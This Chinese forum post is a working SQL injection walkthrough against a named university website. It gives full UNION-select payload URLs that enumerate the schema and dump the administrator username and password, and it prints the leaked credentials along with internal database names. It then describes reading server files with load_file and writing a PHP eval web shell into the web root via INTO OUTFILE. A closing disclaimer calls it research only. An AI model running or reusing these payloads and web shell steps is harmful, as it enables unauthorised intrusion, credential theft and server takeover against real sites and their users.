By wei7609450
好久没练习基础知识了.今天找出个网站练习练习.
测试目标:http://www.hncz.edu.cn/
Sql.Inj..
/**/and/**/1=1_|_1=2
order by...
测试目标:
http://www.hncz.edu.cn/
寻找突破口:
http://www.hncz.edu.cn/flx2/read.php?id=1953
+and+1=2+union+select+1,2,3,user(),database(),6,7,8,version(),10,11,12,13
user()[email protected]
database() hncz
version()5.0.67-community-nt >5 版本可以暴库.
下面正式的很好很舒服的无痛注射开始:
http://www.hncz.edu.cn/flx2/read.php?id=1953+and+1=2+union+select+1,2,3,4,5,6,7,GROUP_CONCAT(DISTINCT+table_schema),9,10,11,12,13+from+information_schema.columns
得到如下的数据库:
information_schema,alumni,bbs_hncz,cacti,cwkj,dzbbs,fxyggglx,fz,hncz,hncz1,hnczdata,hnmnw,hq,hqin,index,jxcgj,kyc,lyb,mysql,shenjixue,spfj,usersystem,weberp,wlxxzx,ws,xsc,zxcy,zzb
我选择了 bbs_hncz
得到如下表:
access,activities,activityapplies,adminactions,admingroups,adminnotes,adminsessions,advertisements,announcements,attachments,attachtypes,banned,bbcodes,blogcaches,buddys,cdb_access,cdb_activities,cdb_activityapplies,cdb_adminactions,cdb_admingroups,cdb_adminnotes,cdb_adminsessions,cdb_advertisements,cdb_announcements,cdb_attachments,cdb_attachtypes,cdb_banned,cdb_bbcodes,cdb_blogcaches,cdb_buddys,cdb_caches,cdb_creditslog,cdb_crons,cdb_failedlogins,cdb_favorites,cdb_forumfields,cdb_forumlinks,cdb_forums,cdb_karmalog,cdb_medals,cdb_memberfields,cdb_members,cdb_moderators,cdb_modworks,cdb_myposts,cdb_mythreads,cdb_onlinelist,cdb_onlinetime,cdb_orders,cdb_paymentlog,cdb_pluginhooks,cdb_plugins,cdb_plugins_settings,cdb_pluginvars,cdb_pms,cdb_pmsearchindex,cdb_polloptions,cdb_polls,cdb_posts,cdb_profilefields,cdb_promotions,cdb_pushedthreads,cdb_ranks,cdb_ratelog,cdb_regips,cdb_relatedthreads,cdb_rewardlog,cdb_rsscaches,cdb_searchindex,cdb_sessions,cdb_settings,cdb_smilies,cdb_stats,cdb_statvars,cdb_styles,cdb_sty
呵呵一开始我们就知道当前库是这个: hncz to hex吧
http://www.hncz.edu.cn/flx2/read.php?id=1953+and+1=2+union+select+1,2,3,4,5,6,7,GROUP_CONCAT(DISTINCT+table_name),9,10,11,12,13+from+information_schema.columns+where+table_schema=0x686E637A
得到如下表:
base,down,downlb,liu_admin,liu_book,liu_mysystem,liu_syste,news,news1,news2,news4,newslb,qxz,tpdc,userinfo,wlktdc,yyb
我们注射字段:
http://www.hncz.edu.cn/flx2/read.php?id=1953+and+1=2+union+select+1,2,3,4,5,6,7,GROUP_CONCAT(DISTINCT+column_name),9,10,11,12,13+from+information_schema.columns+where+table_name=0x6C69755F61646D696E
得到字段:
id,user,pass
下面我们来循环出用户名密码:
http://www.hncz.edu.cn/flx2/read.php?id=1953+and+1=2+union+select+1,2,3,4,5,6,7,GROUP_CONCAT(user,0x5c,pass),9,10,11,12,13+from+liu_admin
admin\8811788
__________________________________________________________
有时候我们列出了用户名密码也不一定能找到后台.就是找到后台也
不一定能得到shell.
于是乎我们就会尝试 Load_fiel
我们可以利用 substring 函数
Substring(str,pos,len)解决问题.
他的意思是从字符串str的pos位位置起返回len个字符的子串.譬如Substring(load_file(A),10,100)
就是把A的内容的第10个字母开始回显100个给你.那么就能逐段逐段的回显啦.
得到有用的数据后.
我们本地连接下
安装phpStudy.exe
然后在 G:\phpStudy\MySQL\bin 目录下放个 cmd.bat,里面写cmd,保存,打开。。
然后写入:mysql -h网址 -u用户名 -p密码
说下把,-h后面的是域名,-u后面的是帐号,-p后面是密码
连接之..
然后我们依次执行以下语句:
create table a(str TEXT);
insert into a values("<?php eval($_POST[cmd])?>");
select * from a into outfile 'd:\\site\\bin\\scode.php';
其中”<?php eval($_POST[cmd])?>“是LANKER微型PHP后门服务端代码,
d:\\site\\bin\\这个是PHPMYADMIN的路径,d:\\site\\是绝对路径。。
确定后成功返回结果
然后用PHP后门客户端连接上传PHP木马,
http://www.XXXXXX.com/bin/scode.php
密码...自己看.
对于这个案例不知道可否成功,只是思路而已本人并没测试。
求高手指导...Q 417609567
Over...
(以上内容仅供作为研究,用于非法用途所造成的法律责任由其本人负责!)
